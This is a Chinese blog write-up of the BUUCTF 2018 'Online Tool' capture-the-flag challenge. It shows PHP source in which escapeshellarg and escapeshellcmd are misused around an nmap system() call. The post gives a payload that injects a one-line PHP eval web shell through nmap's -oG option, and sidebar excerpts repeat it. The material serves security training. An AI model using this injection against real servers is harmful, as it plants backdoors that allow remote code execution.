BUUCTF 2018 Online Tool

最新推荐文章于 2022-08-08 22:15:00 发布
最新推荐文章于 2022-08-08 22:15:00 发布
阅读量153 收藏
点赞数
文章标签: nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50613938/article/details/120951006
版权

在这里插入图片描述
//首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用的这里没什么用


```handlebars
if(!isset(
$_GET['host'])) {//这里传进来了一个参数
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);        /*一眼就能看出来这里的
$host = escapeshellcmd($host);      代码很不凡,在下面分析*/
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);  //$_SERVER['REMOTE_ADDR'] #正在浏览当前页面用户的 IP 地址。
echo
'you are in sandbox '.$sandbox;
@
mkdir($sandbox);
chdir($sandbox);
echo
system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);


//执行把host传进来的nmap命令,nmap的一个参数-oG可以实现将命令和结果写到文件
}所以我们利用-oG参数往网站里面写一行一句话木马,
?host=’ <?php @eval($_POST["cmd"]);?> -oG a.php ’
我们利用-oG命令来将一句话木马输入到a.php,
其实就是将参数的数值输入到制定目标文件里,如果没有制定目标文件就创建。
落夜雨
关注
BUUCTF 2018 Online Tool(escapeshellarg和escapeshellcmd)
weixin_45577185的博客
07-24 180
答案博客 参考博客 百度来了一篇文章: https://paper.seebug.org/164/ 这两个函数按代码里那样的顺序使用,是会产生漏洞的,如果是反过来就不会。 escapeshellarg: escapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 命令执行函数,并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。 escapeshellcmd: e
BUUCTF 2018 Online Tool
热门推荐
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
BUUCTF 2018 Online Tool(escapeshellarg和escapeshellcmd使用不当导致rce)
qq_45521281的博客
05-20 1192
参考: 谈谈escapeshellarg参数绕过和注入的问题 PHP escapeshellarg()和escapeshellcmd()并用之殇 谈escapeshellarg绕过与参数注入漏洞 https://blog.csdn.net/qq_26406447/article/details/100711933 进入题目显示php源码: 这里用到escapeshellarg()、escapeshellcmd()两个函数: escapeshellarg: escapeshellarg() 将给字符串增加一
2018 online tool
ater123的博客
06-23 127
<?php ​ if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } ​ if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); $host ...
[BUUCTF 2018]Online Tool
m0_62709637的博客
05-09 1335
新知识: escapeshellarg()函数: 把字符串转码成可以在shell命令里使用的参数,将单引号进行转义,转义之后,再在左右加单引号; escapeshellcmd()函数: 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将&#;`|*?~<>^()[]{}$\, \x0A和\xFF以及不配对的单/双引号转义; 这两个函数若同时使用,将会产生逻辑漏洞; 个人理解防范原理:将特殊符号进行转译处理,使其变为字符串,从而无法发挥正常作用; 绕过方
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 2061
php命令执行基础与CTF例题分析
buu web:Online Toolnmap文件写入)
m0_55378150的博客
04-05 595
打开靶场,好家伙,上来就是代码,我喜欢 老规矩,找核心代码 echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 这里调用了system函数使用了nmap命令,只有host参数是可控的,并且它是以get方式传入的,我们先测试一下本地ip:?host=127.0.0.1 正常回显,我们往回看看怎么利用 if(!isset($_GET['host'])) { highlight_file(__FILE__); } e
『CTF Web复现』[BUUCTF 2018]Online Tool
Ho1aAs‘s Blog
10-24 3833
@[toc] # 利用点 - nmap写文件 - escapeshellarg() + escapeshellcmd()使用不当 # Payload ``` [GET]http://URL/?host='<?php eval($_POST[a]);?> -oG 1.php ' ```
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 362
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3984
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
1.29刷题
Lumos427的博客
01-29 583
1.[BUUCTF 2018]Online Tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host
buuctfOnline tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3167
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
buuctf(探险2)
qq_62046696的博客
08-08 919
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
关于buu上的namp两道题
m0_55185160的博客
03-28 1952
关于buu上的namp两道题 这个是题目的源码 源码中只要用到了escapeshellarg()函数和escapeshellcmd()函数,经过搜索这两个函数我们来了解这两个函数: 看这些概念没看太懂,那么我们来实际测试一下,更容易理解些 经过 escapeshellarg 函数处理过的参数被拼凑成 shell 命令,并且被双引号包裹这样就会造成漏洞,这主要在于bash中双引号和单引号解析变量是有区别的。 在解析单引号的时候 , 被单引号包裹的内容中如果有变量 , 这.
第三十三题——[BUUCTF 2018]Online Tool
分享简单的安全技术
04-22 247
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $
BUUCTF解题web十一道(03)
qq_45837896的博客
06-09 772
[极客大挑战 2019]HardSQL 看这个标题着实心里一紧,完了,写不出来了? 又是同一系列,这次看看有什么新挑战 输入万能密码 出现这个,应该是敏感字符过滤,然后试了几次,发现+,=,and,<,>,空格,tab,换行都被过滤 测试闭合 单引号 是,有个闭合错误,但是这样不能用联合注入和堆叠注入,没有空格可以用,只能考虑报错注入 好家伙报错注入忘记很多,再看一遍 报错注入常见函数: updatexml(),extractvalue,floor() floor(rand(0
Office365与SharePoint Online开发指南
"SharePoint Online是微软提供的一款基于云端的企业协作平台,主要面向希望在云环境中构建、管理和协作的组织。本书详细介绍了如何使用SharePoint Online进行各种级别的定制和开发,涵盖了从基本的浏览器定制到高级...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值